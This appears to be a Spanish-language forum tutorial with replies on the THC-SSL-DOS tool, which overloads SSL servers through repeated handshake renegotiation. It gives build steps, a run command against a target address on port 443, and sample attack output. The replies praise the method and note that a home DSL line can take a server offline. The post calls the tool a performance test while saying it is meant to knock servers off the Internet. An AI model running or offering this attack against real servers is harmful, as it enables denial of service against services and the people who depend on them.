Thc SSL Dos

_____________ ___  _________
     \__    ___/   |   \ \_   ___ \
       |    | /    ~    \/    \  \/
       |    | \    Y    /\     \____
       |____|  \___|_  /  \______  /
                     \/          \/

THC-SSL-DOS es una herramienta para comprobar el rendimiento de SSL. THC-SSL-DOS explota esta característica asimétrica sobrecargando el servidor y lo derriba de Internet. Este problema afecta a todas las implementaciones de SSL en la actualidad. Los vendedores son conscientes de este problema desde el año 2003 y el tema ha sido discutido ampliamente.

Uso : cd Desktop
         cd thc-ssl-dos-1.4
         cd src
         configure
         make install

Ej: 443/tcp  open   ssl/http   Apache httpd

./thc-ssl-dos 127.3.133.7 443 --accept
Handshakes 0 [0.00 h/s], 0 Conn, 0 Err
Secure Renegotiation support: yes
Handshakes 0 [0.00 h/s], 97 Conn, 0 Err
Handshakes 68 [67.39 h/s], 97 Conn, 0 Err
Handshakes 148 [79.91 h/s], 97 Conn, 0 Err
Handshakes 228 [80.32 h/s], 100 Conn, 0 Err
Handshakes 308 [80.62 h/s], 100 Conn, 0 Err
Handshakes 390 [81.10 h/s], 100 Conn, 0 Err
Handshakes 470 [80.24 h/s], 100 Conn, 0 Err

genial tuto, lo pongo en marcha ya, saludos

Con THC-SSL nos podemos percatar como pasa a segundo plano, los ataques Dos comunes, que eran un flood de paquetes TCP/UDP , requiriendo una gran cantidad de banda ancha para poder realmente dejar offline un servidor, en cuanto a los handshake que realiza cada paguina que implemente certificados SSL, requieren un consumo de CPU mucho mayor que cualquiera con una conexion DSL puede llegar dejar Offline un servidor, provocando una mayor cifra de 300 ssl handshakes , muy interesante esta debilidad de manipular SSL por parte de los servidores.